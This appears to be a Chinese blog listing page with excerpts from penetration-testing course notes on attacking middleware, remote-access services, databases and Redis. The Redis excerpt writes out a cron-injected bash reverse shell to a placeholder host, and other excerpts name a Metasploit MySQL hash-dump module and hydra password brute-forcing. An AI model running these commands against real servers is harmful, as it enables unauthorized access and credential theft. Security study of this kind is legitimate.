- 博客(13)
- 收藏
- 关注
原创 小迪安全 第59天 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
IIS现在用的也少了,漏洞也基本没啥用。
2023-12-17 16:05:19 1270 1
原创 小迪安全 第58天 服务攻防-应用协议&设备 Kibana&Zabbix&远控向日葵&VNC&TV
向日葵会随机一个端口号,所以会对每个端口进行探针,速度会有些慢。
2023-12-16 23:43:35 520 1
原创 小迪安全 第57天 服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解
hydra 是一个自动化的爆破工具,暴力破解弱密码, 是一个支持众多协议的爆破工具,已经集成到 KaliLinux 中,直接在终端打开即可 -s PORT 可通过这个参数指定非默认端口。这个漏洞条件需要知道一个非root用户的账号密码,这个账号不能用ssh链接,可以借助这个漏洞反弹shell,但反弹的又不是root用户,迪总说这个漏洞没啥用,俺也觉得没用,可以看下面这个链接。-p PASS 小写,指定密码破解,少用,一般是采用密码字典。如果提示红框里的东西,那就是有,如果没提示,那就没有。
2023-12-16 20:30:23 1166 1
原创 小迪安全 第56天 服务攻防-数据库安全&H2&Elasticsearch&CouchDB&Influxdb 复现
时序数据库是近几年一个新的概念,与传统的Mysql关系型数据库相比,它的最大的特点是:数据按照时间顺序存储。举例来说,日志数据,是以时间顺序存储的,所以用时序数据库存储是一种很好的选择。使用Mysql在存储的过程中,不是对这种基于时间的数据进行优化的,所以,在查询、插入上有一些瓶颈。默认端口:Web 操作界面默认运行在 localhost 8083 端口;HTTP API 接口默认运行在 localhost 8086 端口。
2023-12-14 23:20:15 1268 1
原创 小迪安全 第55天 服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE
set yy"\n\n\n* * * * *bash -i>& /dev/tcp/反弹ip地址/5555 0>&1\n\n\n" //设置启动命令。use auxiliary/scanner/mysql/mysql_authbypass_hashdump //选择该模块。config set dir /var #设置 WEB 写入目录在/var。config set dir /var/spool/cron //设置启动目录。set threads 10 //设置线程。
2023-12-14 00:47:20 1194 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人